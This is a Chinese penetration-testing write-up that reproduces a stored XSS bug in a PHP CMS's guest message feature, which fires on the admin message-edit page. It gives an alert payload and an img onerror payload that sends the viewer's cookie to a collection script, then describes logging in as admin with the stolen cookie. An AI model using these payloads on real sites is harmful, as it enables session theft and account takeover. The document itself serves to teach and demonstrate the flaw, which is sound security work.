眾所周知,我們一般將XSS分為三類,反射型、存儲型、DOM型,反射型XSS這個基本可以說是沒什么利用價值,因為它是不能留存下來的,你改變數據執行了一個臨時的XSS,但這個數據沒有存儲到服務器、數據庫中,不能再次展示給別人看,其他人進入同一頁面請求服務器并不受你的腳本影響,DOM型XSS也是一樣,它就是通過影響前端的DOM環境來執行一些js腳本,執行的腳本并沒有留存下來,所以危害比較大的還是存儲型XSS,也叫永久型XSS。
平常在我的滲透測試工作過程中,不管是什么類型的XSS問題,驗證存在XSS問題也就js一小段腳本彈一個框,證明存在即可,但實際上,作為一名高級滲透測試人員肯定是要知道對于存儲型XSS,針對這種漏洞,如何搭建環境接受跨站攻擊獲取的數據和利用的一整套流程。另外再補充下,只要是能讓你輸入的地方,留言、評論甚至URL上的參數等,你都可以試一下,還有驗證XSS時候,不要只會一個<script>去alert,用<img>報錯執行、<a>超鏈接執行JAVAscript偽協議都可以,實際上將<、>這種特殊符號及編碼過濾就已經能解決XSS很多問題了。
這次來復現的漏洞是存儲型XSS,它的CVE編號是CVE-2017-12984,它是一套基于php環境的CMS系統——PHPMwWind,漏洞版本號<=5.4,所以這里的系統我還是放在phpstudy這套集成環境里,漏洞位置位于用戶留言功能里。
安裝不說了,看下這個漏洞存在的位置在于message.php雖然對于用戶的留言進行了實體編碼過濾,這使得js腳本僅對于當前頁面無法執行content的腳本內容,但是它任然被正常插入存到數據庫中。
但真正的使這個腳本產生影響的就是位于/admin/message_update.php后臺管理頁面,未將content內容做任何處理,就直接取出來顯示,造成的跨站腳本攻擊。
首先漏洞驗證,這個我不貼圖了,payload就<img src=0 onerror = alert(/xss/);>就行了;輸入的是在用戶留言頁面,產生的XSS是在管理員的留言功能管理頁,點擊修改即可觸發。
再次,我們插入攻擊腳本攻擊獲取的數據怎么接收,你得需要寫個簡單的test.php腳本去接收數據,你可以自己去搞一套云服務器環境,這里我為了方便,就和本地環境放一起了,這里用的是php腳本,肯定需要在php的環境下接收,腳本內容如下:
這很清楚了,通俗易懂,接收到獲取的參數c的值,然后把它寫到getC.txt中,就是這么簡單,再在同一目錄下建個getC.txt等著收數據就行了,先測試檢查下是否可行,URL加個參數值cc,打開getC.txt查看沒問題。
好了,現在構造我們的攻擊腳本,這里我是利用報錯執行方法,添加一個img字節點,設置它的屬性,圖片來源為我們接受數據腳本的地址,而取得的cookie卻是查看這段代碼用戶的cookie:
<img src = x onerror
=document.body.AppendChild(document.createElement('img')).setAttribute('src','http://localhost/test.php?c='+document.cookie);>
登錄后臺管理員,進入留言管理模塊,點擊留言修改按鈕,觸發XSS,這里為什么兩個圖片標記,第一個使我們插入的<img>圖片標簽,第二個是我們的onerror執行的腳本內容,添加子元素節點標簽<img>,因為跨站腳本(XSS)能夠執行,所以我們這個子元素<img>標簽能添加,可以看到第二個標簽src來源是我的cookie接受的腳本,我的參數c已經獲取到了我要的cookie,為什么能夠傳過去,因為網頁要加載這個<img>圖片,它需要向它的源服務器進行GET請求,所以就會將我獲得的cookie以GET參數傳過去。
現在檢查一下我獲取的數據小文本getC.txt有沒有得到,果然:
會話憑證cookie已得到,剩下的就簡單了,老兵cookie欺騙工具,放入我們拿到手的cookie,成功進入管理員后臺,這就是惡意攻擊者利用跨站腳本竊取會話憑證的大致流程,也證明了它的危害。
